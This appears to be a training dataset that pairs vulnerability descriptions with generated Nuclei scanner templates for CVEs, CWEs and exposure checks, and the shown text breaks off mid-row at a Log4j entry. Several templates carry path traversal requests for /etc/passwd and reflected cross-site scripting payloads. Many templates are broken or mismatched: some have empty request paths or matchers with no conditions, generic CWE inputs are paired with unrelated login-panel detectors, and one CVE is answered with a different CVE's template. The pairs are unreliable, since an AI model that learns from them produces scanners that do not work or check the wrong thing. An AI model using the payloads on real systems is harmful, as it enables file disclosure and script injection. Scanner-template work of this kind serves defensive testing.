instruction
stringlengths 41
188
| input
stringlengths 165
3.12k
| output
stringlengths 256
2.26M
| category
stringclasses 3
values | severity
stringclasses 5
values | id
stringlengths 5
54
|
|---|---|---|---|---|---|
Generate a Nuclei template for CVE-2024-4956
|
Title: Path Traversal in CVE-2024-4956
Summary: Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.
Vulnerability Type: Path Traversal
Severity: high
Indicators: error, vulnerability detected
|
id: CVE-2024-4956
info:
name: Sonatype Nexus Repository Manager 3 - Local File Inclusion
author: ritikchaddha
severity: high
description: Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.
tags: cve,cve2024,nexus,lfi,sonatype,vuln
http:
- method: GET
path:
- "{{BaseURL}}/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
matchers:
- type: dsl
condition: and
|
cve
|
high
|
CVE-2024-4956
|
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
|
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:
private, personal information, such as p
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor
Severity: medium
Indicators: error, unauthorized
|
id: intelbras-login
info:
name: Intelbras Router Login Panel - Detect
author: DhiyaneshDK
severity: info
description: Intelbras router logjn panel was detected.
tags: panel,edb,discovery
http:
- method: GET
path:
- "{{BaseURL}}/login.html"
matchers:
- type: word
words:
- "<title>Intelbras</title>"
- type: status
status:
- 200
|
cwe
|
medium
|
CWE-200
|
Generate a Nuclei template for: Credential Guard Not Enabled
|
Title: Credential Guard Not Enabled
Summary: Credential Guard Not Enabled. Verifies if Windows Defender Credential Guard is disabled, reducing protection against credential theft.
Vulnerability Type: Security Check
Severity: high
Indicators: vulnerability detected
|
id: credential-guard-disabled
info:
name: Credential Guard Not Enabled
author: princechaddha
severity: high
description: Verifies if Windows Defender Credential Guard is disabled, reducing protection against credential theft.
tags: credential-guard,code,windows-audit
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
generic
|
high
|
credential-guard-disabled
|
Generate a Nuclei template for CVE-2021-41467
|
Title: Cross-Site Scripting (XSS) in justwriting_project justwriting
Summary: Cross-site scripting (XSS) vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter.
Vulnerability Type: Cross-Site Scripting (XSS)
Severity: medium
Affected Products: justwriting_project justwriting
Indicators: error, vulnerability detected
|
id: CVE-2021-41467
info:
name: JustWriting - Cross-Site Scripting
author: madrobot
severity: medium
description: A cross-site scripting vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter.
tags: cve2021,cve,justwriting,xss,justwriting_project,vuln
http:
- method: GET
path:
matchers:
- type: dsl
condition: and
- method: GET
path:
matchers:
- type: dsl
condition: and
|
cve
|
medium
|
CVE-2021-41467
|
Generate a Nuclei template for: Unrestricted Oracle Database Access in Azure NSGs
|
Title: Unrestricted Oracle Database Access in Azure NSGs
Summary: Unrestricted Oracle Database Access in Azure NSGs. Ensure that Microsoft Azure network security groups (NSGs) do not allow unrestricted inbound access on TCP port 1521, used for Oracle Database, to protect against unauthorized database access.
Vulnerability Type: Security Check
Severity: high
Indicators: vulnerability detected
|
id: azure-nsg-oracle-db-unrestricted
info:
name: Unrestricted Oracle Database Access in Azure NSGs
author: princechaddha
severity: high
description: Ensure that Microsoft Azure network security groups (NSGs) do not allow unrestricted inbound access on TCP port 1521, used for Oracle Database, to protect against unauthorized database access.
tags: cloud,devops,azure,microsoft,nsg,azure-cloud-config
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
generic
|
high
|
azure-nsg-oracle-db-unrestricted
|
Generate a Nuclei template for CVE-2018-19877
|
Title: Cross-Site Scripting (XSS) in adiscon loganalyzer
Summary: login.php in Adiscon LogAnalyzer before 4.1.7 has XSS via the Login Button Referer field.
Vulnerability Type: Cross-Site Scripting (XSS)
Severity: medium
Affected Products: adiscon loganalyzer
Indicators: error, vulnerability detected
|
id: CVE-2018-19877
info:
name: Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting
author: arafatansari
severity: medium
description: Adiscon LogAnalyzer before 4.1.7 contains a cross-site scripting vulnerability in the 'referer' parameter of the login.php file.
tags: cve,cve2018,adiscon,xss,edb,vuln
http:
- method: GET
path:
- "{{BaseURL}}/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E"
matchers:
- type: word
words:
- "value=""><script>confirm(document.domain)</script>"
part: body
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200
|
cve
|
medium
|
CVE-2018-19877
|
Generate a Nuclei template for: slsh - Privilege Escalation
|
Title: slsh - Privilege Escalation
Summary: slsh - Privilege Escalation. slsh is a command-line shell that is designed to provide a secure environment for executing shell commands. It is often used in scenarios where security and privilege separation are important, such as in web hosting environments or when running untrusted code. slsh aims to provide a secure and restricted shell environment for executing commands.
Vulnerability Type: Security Check
Severity: high
Indicators: vulnerability detected
|
id: privesc-slsh
info:
name: slsh - Privilege Escalation
author: daffainfo
severity: high
description: slsh is a command-line shell that is designed to provide a secure environment for executing shell commands. It is often used in scenarios where security and privilege separation are important, such as in web hosting environments or when running untrusted code. slsh aims to provide a secure and restricted shell environment for executing commands.
tags: code,linux,slsh,privesc,local
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
generic
|
high
|
privesc-slsh
|
Generate a Nuclei template for: BlackMoon FTP Free Edition Service - Detect
|
Title: BlackMoon FTP Free Edition Service - Detect
Summary: BlackMoon FTP Free Edition Service - Detect. BlackMoon FTP Free Edition service was detected.
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: blackmoon-free-ftp-detect
info:
name: BlackMoon FTP Free Edition Service - Detect
author: pussycat0x
severity: info
description: BlackMoon FTP Free Edition service was detected.
tags: network,ftp,blackmoon,detect,tcp,discovery
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
generic
|
info
|
blackmoon-free-ftp-detect
|
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
|
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:
private, personal information, such as p
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor
Severity: medium
Indicators: error, unauthorized
|
id: configure-dns-server
info:
name: DNS Server Not Implemented - Detect
author: pussycat0x
severity: info
description: DNS is recommended to be configured over TLS. This prevents intermediate parties and potential attackers from viewing the content of DNS queries and can also assure that DNS is being provided by the expected DNS servers.
tags: firewall,config,audit,pfsense,file
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
cwe
|
medium
|
CWE-200
|
Generate a Nuclei template for CVE-2023-40755
|
Title: Cross-Site Scripting (XSS) in phpjabbers callback_widget
Summary: There is a Cross Site Scripting (XSS) vulnerability in the "theme" parameter of preview.php in PHPJabbers Callback Widget v1.0.
Vulnerability Type: Cross-Site Scripting (XSS)
Severity: medium
Affected Products: phpjabbers callback_widget
Indicators: error, vulnerability detected
|
id: CVE-2023-40755
info:
name: PHPJabbers Callback Widget v1.0 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: There is a Cross Site Scripting (XSS) vulnerability in the "theme" parameter of preview.php in PHPJabbers Callback Widget v1.0.
tags: cve,cve2023,phpjabbers,callback-widget,xss,vuln
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
- "PHPJabbers"
part: body
- method: GET
path:
- "{{BaseURL}}/preview.php?theme=theme10dnel8%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Eko0so"
matchers:
- type: word
words:
- "theme=theme10dnel8"><script>alert(document.domain)</script>ko0"
part: body
- type: word
words:
- "text/html"
part: content_type
- type: status
status:
- 200
|
cve
|
medium
|
CVE-2023-40755
|
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
|
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:
private, personal information, such as p
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor
Severity: medium
Indicators: error, unauthorized
|
id: submitty-login
info:
name: Submitty Login Panel - Detect
author: princechaddha
severity: info
description: Submitty login panel was detected.
tags: panel,submitty,oss,discovery
http:
- method: GET
path:
- "{{BaseURL}}/authentication/login"
matchers:
- type: word
words:
- "submitty-banner"
- "https://submitty.org"
part: body
condition: and
- type: status
status:
- 200
|
cwe
|
medium
|
CWE-200
|
Generate a Nuclei template for: WordPress DB Backup
|
Title: WordPress DB Backup
Summary: WordPress DB Backup. WordPress DB Backup plugin exposes db file along with directory listing.
Vulnerability Type: Security Check
Severity: medium
Indicators: vulnerability detected
|
id: wordpress-db-backup-listing
info:
name: WordPress DB Backup
author: Suman_Kar
severity: medium
description: WordPress DB Backup plugin exposes db file along with directory listing.
tags: wordpress,backup,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/uploads/database-backups/"
matchers:
- type: word
words:
- "Index of /"
- "wp-content/uploads/database-backups"
- ".sql"
part: body
condition: and
- type: status
status:
- 200
|
generic
|
medium
|
wordpress-db-backup-listing
|
Generate a Nuclei template for: CloudFormation Termination Protection - Disabled
|
Title: CloudFormation Termination Protection - Disabled
Summary: CloudFormation Termination Protection - Disabled. Ensure that Termination Protection safety feature is enabled for your Amazon CloudFormation stacks in order to protect them from being accidentally deleted.
Vulnerability Type: Security Check
Severity: medium
Indicators: vulnerability detected
|
id: stack-termination-disabled
info:
name: CloudFormation Termination Protection - Disabled
author: DhiyaneshDK
severity: medium
description: Ensure that Termination Protection safety feature is enabled for your Amazon CloudFormation stacks in order to protect them from being accidentally deleted.
tags: cloud,devops,aws,amazon,cloudformation,aws-cloud-config
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
generic
|
medium
|
stack-termination-disabled
|
Generate a Nuclei template for: PRTG Security Checks
|
Title: PRTG Security Checks
Summary: PRTG Security Checks. A simple workflow that runs all PRTG related nuclei templates on a given target.
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: prtg-workflow
info:
name: PRTG Security Checks
author: daffainfo
severity: info
description: A simple workflow that runs all PRTG related nuclei templates on a given target.
tags: unknown
http:
- method: GET
path:
- "/"
matchers:
- type: status
status:
- 200
|
generic
|
info
|
prtg-workflow
|
Generate a Nuclei template for: Safe SVG Detection
|
Title: Safe SVG Detection
Summary: Safe SVG Detection. Tags: tech, wordpress, wp-plugin
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: wordpress-safe-svg
info:
name: Safe SVG Detection
author: ricardomaia
severity: info
description: Safe SVG Detection
tags: tech,wordpress,wp-plugin,top-100,top-200,discovery
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/safe-svg/readme.txt"
matchers:
- type: dsl
- type: regex
part: body
|
generic
|
info
|
wordpress-safe-svg
|
Generate a Nuclei template to detect Cross-site Scripting
|
Title: Cross-site Scripting (CWE-79)
Summary: The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. There are many variants of cross-site scripting, characterized by a variety of terms or involving different attack topologies. However, they all indicate the same fundamental weakness: improper neutralization of dangerous input between the adversary and a victim.
Vulnerability Type: Cross-site Scripting
Severity: high
Indicators: vulnerability detected, error
|
id: wp-custom-tables-xss
info:
name: WordPress Custom Tables 3.4.4 - Cross-Site Scripting
author: daffainfo
severity: high
description: WordPress Custom Tables 3.4.4 plugin contains a cross-site scripting vulnerability via the key parameter.
tags: wpscan,wordpress,xss,wp-plugin,vuln
http:
- method: GET
path:
matchers:
- type: word
words:
- "custom tables"
- "Tags:"
condition: and
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200
|
cwe
|
high
|
CWE-79
|
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
|
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:
private, personal information, such as p
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor
Severity: medium
Indicators: error, unauthorized
|
id: freepbx-administration-panel
info:
name: FreePBX Admin Panel - Detect
author: tess,darses
severity: info
description: FreePBX admin panel was detected.
tags: freepbx,panel,sangoma,discovery
http:
- method: GET
path:
- "{{BaseURL}}/admin/config.php"
matchers:
- type: word
words:
- "<title>FreePBX"
- "FreePBX</title>"
part: body
condition: or
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200
|
cwe
|
medium
|
CWE-200
|
Generate a Nuclei template for CVE-2018-15138
|
Title: Path Traversal in ericssonlg ipecs_nms
Summary: Ericsson-LG iPECS NMS 30M allows directory traversal via ipecs-cm/download?filename=../ URIs.
Vulnerability Type: Path Traversal
Severity: high
Affected Products: ericssonlg ipecs_nms
Indicators: error, vulnerability detected
|
id: CVE-2018-15138
info:
name: LG-Ericsson iPECS NMS 30M - Local File Inclusion
author: 0x_Akoko
severity: high
description: Ericsson-LG iPECS NMS 30M allows local file inclusion via ipecs-cm/download?filename=../ URIs.
tags: cve2018,cve,ericsson,lfi,traversal,edb,ericssonlg,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data"
- "{{BaseURL}}/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg"
matchers:
- type: regex
- type: status
status:
- 200
|
cve
|
high
|
CVE-2018-15138
|
Generate a Nuclei template to detect Insufficiently Protected Credentials
|
Title: Insufficiently Protected Credentials (CWE-522)
Summary: The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.
Vulnerability Type: Insufficiently Protected Credentials
Severity: medium
Indicators: unauthorized
|
id: ibm-hmc-default-login
info:
name: IBM Power HMC - Default Login
author: R3S OST
severity: high
description: IBM HMC default admin login credentials were discovered.
tags: default-login,ibm,hmc,vuln
http:
- method: GET
path:
matchers:
- type: dsl
condition: and
|
cwe
|
medium
|
CWE-522
|
Generate a Nuclei template for: Area Rat C2 - Detect
|
Title: Area Rat C2 - Detect
Summary: Area Rat C2 - Detect. Ares is a Python Remote Access Tool.
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: ares-rat-c2
info:
name: Area Rat C2 - Detect
author: pussycat0x
severity: info
description: Ares is a Python Remote Access Tool.
tags: c2,ir,osint,ares,panel,rat,vuln
http:
- method: GET
path:
- "{{BaseURL}}/login"
matchers:
- type: word
words:
- "<title>Ares</title>"
- "Passphrase:"
part: body
condition: and
- type: status
status:
- 200
|
generic
|
info
|
ares-rat-c2
|
Generate a Nuclei template for CVE-2023-35078
|
Title: Authentication Bypass in ivanti endpoint_manager_mobile
Summary: An authentication bypass vulnerability in Ivanti EPMM allows unauthorized users to access restricted functionality or resources of the application without proper authentication.
Vulnerability Type: Authentication Bypass
Severity: critical
Affected Products: ivanti endpoint_manager_mobile
Indicators: unauthorized
|
id: CVE-2023-35078
info:
name: Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass
author: parth,pdresearch
severity: critical
description: Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10 allows remote attackers to obtain PII, add an administrative account, and change the configuration because of an authentication bypass, as exploited in the wild in July 2023. A patch is available.
tags: cve,cve2023,kev,ivanti,mobileiron,epmm,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/mifs/aad/api/v2/admins/users"
matchers:
- type: dsl
condition: and
|
cve
|
critical
|
CVE-2023-35078
|
Generate a Nuclei template for CVE-2023-0448
|
Title: Cross-Site Scripting (XSS) in matbao wp_helper_premium
Summary: The WP Helper Lite WordPress plugin, in versions < 4.3, returns all GET parameters unsanitized in the response, resulting in a reflected cross-site scripting vulnerability.
Vulnerability Type: Cross-Site Scripting (XSS)
Severity: medium
Affected Products: matbao wp_helper_premium
Indicators: error, vulnerability detected
|
id: CVE-2023-0448
info:
name: WP Helper Lite < 4.3 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: The WP Helper Lite WordPress plugin, in versions < 4.3, returns all GET parameters unsanitized in the response, resulting in a reflected cross-site scripting vulnerability.
tags: cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,wp-helper-lite,matbao,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=surveySubmit&a=%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E"
matchers:
- type: dsl
condition: and
|
cve
|
medium
|
CVE-2023-0448
|
Generate a Nuclei template for CVE-2022-1713
|
Title: Vulnerability (CWE-918) in diagrams drawio
Summary: SSRF on /proxy in GitHub repository jgraph/drawio prior to 18.0.4. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information.
Vulnerability Type: Vulnerability (CWE-918)
Severity: high
Affected Products: diagrams drawio
Indicators: error, vulnerability detected
|
id: CVE-2022-1713
info:
name: Drawio <18.0.4 - Server-Side Request Forgery
author: pikpikcu
severity: high
description: Drawio prior to 18.0.4 is vulnerable to server-side request forgery. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information.
tags: cve,cve2022,drawio,ssrf,oss,huntr,diagrams,vuln
http:
- method: GET
path:
matchers:
- type: word
words:
- "<title>Flowchart Maker & Online Diagram Software</title>"
part: body
- type: word
words:
- "application/octet-stream"
part: header
|
cve
|
high
|
CVE-2022-1713
|
Generate a Nuclei template for CVE-2019-0195
|
Title: Deserialization of Untrusted Data in apache tapestry
Summary: Manipulating classpath asset file URLs, an attacker could guess the path to a known file in the classpath and have it downloaded. If the attacker found the file with the value of the tapestry.hmac-passphrase configuration symbol, most probably the webapp's AppModule class, the value of this symbol could be used to craft a Java deserialization attack, thus running malicious injected Java code. The vector would be the t:formdata parameter from the Form component.
Vulnerability Type: Deserialization of Untrusted Data
Severity: critical
Affected Products: apache tapestry
Indicators: error, vulnerability detected
|
id: CVE-2021-27850
info:
name: Apache Tapestry - Remote Code Execution
author: pdteam
severity: critical
description: Apache Tapestry contains a critical unauthenticated remote code execution vulnerability. Affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. Note that this vulnerability is a bypass of the fix for CVE-2019-0195. Before that fix it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL.
tags: cve,cve2021,apache,tapestry,vkev,vuln
http:
- method: GET
path:
matchers:
- type: word
words:
- "application/java"
part: header
- type: word
words:
- "configuration"
- "webtools"
part: body
condition: and
- type: status
status:
- 200
|
cve
|
critical
|
CVE-2019-0195
|
Generate a Nuclei template for: UVDesk Helpdesk Installation Page - Exposure
|
Title: UVDesk Helpdesk Installation Page - Exposure
Summary: UVDesk Helpdesk Installation Page - Exposure. Detects exposed UVDesk Helpdesk Installation page.
Vulnerability Type: Security Check
Severity: high
Indicators: vulnerability detected
|
id: uvdesk-helpdesk-installer
info:
name: UVDesk Helpdesk Installation Page - Exposure
author: DhiyaneshDK
severity: high
description: Detects exposed UVDesk Helpdesk Installation page.
tags: misconfig,install,exposure,uvdesk,helpdesk,vuln
http:
- method: GET
path:
- "{{BaseURL}}/#welcome"
matchers:
- type: word
words:
- "UVDesk Helpdesk Community Edition - Installation Wizard"
part: body
- type: status
status:
- 200
|
generic
|
high
|
uvdesk-helpdesk-installer
|
Generate a Nuclei template for CVE-2022-0415
|
Title: Vulnerability (CWE-20) in gogs gogs
Summary: Remote Command Execution in uploading repository file in GitHub repository gogs/gogs prior to 0.12.6.
Vulnerability Type: Vulnerability (CWE-20)
Severity: high
Affected Products: gogs gogs
Indicators: error, vulnerability detected
|
id: CVE-2022-0415
info:
name: Gogs <0.12.6 - Remote Command Execution
author: theamanrawat
severity: high
description: Gogs before 0.12.6 is susceptible to remote command execution via the uploading repository file in GitHub repository gogs/gogs. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
tags: cve,cve2022,rce,gogs,authenticated,huntr,intrusive,vuln
http:
- method: GET
path:
matchers:
- type: word
words:
- "dns"
- "http"
part: interactsh_protocol
- type: word
words:
- "content="Gogs"
part: body_1
|
cve
|
high
|
CVE-2022-0415
|
Generate a Nuclei template for: Monitorr Panel - Detect
|
Title: Monitorr Panel - Detect
Summary: Monitorr Panel - Detect. Tags: panel, monitorr, detect
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: monitorr-panel
info:
name: Monitorr Panel - Detect
author: ritikchaddha
severity: info
description: Monitorr Panel - Detect
tags: panel,monitorr,detect,discovery
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
condition: and
|
generic
|
info
|
monitorr-panel
|
Generate a Nuclei template for: Wordnik API Test
|
Title: Wordnik API Test
Summary: Wordnik API Test. Dictionary Data. Tags: token-spray, wordnik
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: api-wordnik
info:
name: Wordnik API Test
author: daffainfo
severity: info
description: Dictionary Data
tags: token-spray,wordnik
http:
- method: GET
path:
- "https://api.wordnik.com/v4/word.json/hedgehog/topExample?useCanonical=false&api_key={{token}}"
matchers:
- type: word
words:
- ""provider""
- ""year""
- ""rating""
part: body
condition: and
|
generic
|
info
|
api-wordnik
|
Generate a Nuclei template for: Exposed Prometheus
|
Title: Exposed Prometheus
Summary: Exposed Prometheus. Prometheus instance is exposed.
Vulnerability Type: Security Check
Severity: low
Indicators: vulnerability detected
|
id: prometheus-log
info:
name: Exposed Prometheus
author: dhiyaneshDK,thevillagehacker
severity: low
description: Prometheus instance is exposed.
tags: prometheus,misconfig,vuln
http:
- method: GET
path:
- "{{BaseURL}}/prometheus"
- "{{BaseURL}}/actuator/prometheus"
- "{{BaseURL}}/actuator/prometheus;%2f..%2f..%2f"
matchers:
- type: word
words:
- "gateway_request_total"
- "logback_events_total"
condition: or
- type: status
status:
- 200
|
generic
|
low
|
prometheus-log
|
Generate a Nuclei template for CVE-2023-30868
|
Title: Cross-Site Scripting (XSS) in cms_tree_page_view_project cms_tree_page_view
Summary: Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Jon Christopher CMS Tree Page View plugin <= 1.6.7 versions.
Vulnerability Type: Cross-Site Scripting (XSS)
Severity: high
Affected Products: cms_tree_page_view_project cms_tree_page_view
Indicators: error, vulnerability detected
|
id: CVE-2023-30868
info:
name: Tree Page View Plugin < 1.6.7 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7. This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.
tags: cve2023,cve,wpscan,packetstorm,xss,wp,wordpress,authenticated,exploitdb,cms_tree_page_view_project,vuln
http:
- method: GET
path:
matchers:
- type: dsl
condition: and
|
cve
|
high
|
CVE-2023-30868
|
Generate a Nuclei template for: DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure
|
Title: DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure
Summary: DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure. The DSL-124 Wireless N300 ADSL2+ router exposes a backup configuration file that can be downloaded without authentication.
Vulnerability Type: Security Check
Severity: high
Indicators: vulnerability detected
|
id: dlink-n300-backup
info:
name: DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure
author: DhiyaneshDk
severity: high
description: The DSL-124 Wireless N300 ADSL2+ router exposes a backup configuration file that can be downloaded without authentication.
tags: dsl,d-link,disclosure,backup,vuln
http:
- method: GET
path:
matchers:
- type: dsl
condition: and
|
generic
|
high
|
dlink-n300-backup
|
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
|
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:
private, personal information, such as p
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor
Severity: medium
Indicators: error, unauthorized
|
id: icewarp-panel-detect
info:
name: IceWarp Login Panel - Detect
author: ritikchaddha
severity: info
description: IceWarp login panel was detected.
tags: icewarp,panel,discovery
http:
- method: GET
path:
- "{{BaseURL}}/webmail/"
matchers:
- type: word
words:
- "IceWarp"
part: header
- type: status
status:
- 200
|
cwe
|
medium
|
CWE-200
|
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
|
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include:
private, personal information, such as p
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor
Severity: medium
Indicators: error, unauthorized
|
id: hp-blade-system
info:
name: HP BladeSystem Onboard Administrator Panel - Detector
author: pussycat0x
severity: info
description: HPBladeSystem Onboard Administrator panel was detected.
tags: panel,hp,tech,discovery
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
- "<title>HP BladeSystem Onboard Administrator</title>"
- type: status
status:
- 200
|
cwe
|
medium
|
CWE-200
|
Generate a Nuclei template for: Mythic C2 - Detect
|
Title: Mythic C2 - Detect
Summary: Mythic C2 - Detect. A cross-platform, post-exploit, red teaming framework built with python3, docker, docker-compose, and a web browser UI.
It's designed to provide a collaborative and user friendly interface for operators, managers, and reporting throughout red teaming.
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: mythic-c2
info:
name: Mythic C2 - Detect
author: pussycat0x
severity: info
description: A cross-platform, post-exploit, red teaming framework built with python3, docker, docker-compose, and a web browser UI.
It's designed to provide a collaborative and user friendly interface for operators, managers, and reporting throughout red teaming.
tags: c2,ir,osint,mythic,panel,vuln
http:
- method: GET
path:
- "{{BaseURL}}/new/login"
matchers:
- type: word
words:
- "<title>Mythic</title><"
part: body
- type: status
status:
- 200
|
generic
|
info
|
mythic-c2
|
Generate a Nuclei template for: WordPress ThemeMarkers DB Migration File
|
Title: WordPress ThemeMarkers DB Migration File
Summary: WordPress ThemeMarkers DB Migration File. Tags: wordpress, wp-plugin, backup
Vulnerability Type: Security Check
Severity: info
Indicators: vulnerability detected
|
id: wordpress-tmm-db-migrate
info:
name: WordPress ThemeMarkers DB Migration File
author: dwisiswant0
severity: info
description: WordPress ThemeMarkers DB Migration File
tags: wordpress,wp-plugin,backup,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/uploads/tmm_db_migrate/tmm_db_migrate.zip"
matchers:
- type: word
words:
- "application/zip"
part: header
- type: regex
part: body
- type: status
status:
- 200
- type: word
|
generic
|
info
|
wordpress-tmm-db-migrate
|
Generate a Nuclei template for: Selenium - Node Exposure
|
Title: Selenium - Node Exposure
Summary: Selenium - Node Exposure. Selenium was shown to have an exposed node. If a Selenium node is exposed without any form of authentication, remote command execution could be possible if chromium is configured. By default the port is 4444, still, most of the internet facing are done through reverse proxies.
Vulnerability Type: Security Check
Severity: high
Indicators: vulnerability detected
|
id: selenium-exposure
info:
name: Selenium - Node Exposure
author: w0Tx
severity: high
description: Selenium was shown to have an exposed node. If a Selenium node is exposed without any form of authentication, remote command execution could be possible if chromium is configured. By default the port is 4444, still, most of the internet facing are done through reverse proxies.
tags: misconfig,selenium,misconfiguration,rce,chromium,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wd/hub"
matchers:
- type: word
words:
- "WebDriverRequest"
- "<title>WebDriver Hub</title>"
condition: or
- type: status
status:
- 200
|
generic
|
high
|
selenium-exposure
|
Generate a Nuclei template for CVE-2021-44228
|
Title: Vulnerability (CWE-20) in siemens 6bk1602-0aa12-0tp0_firmware and others
Summary: Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
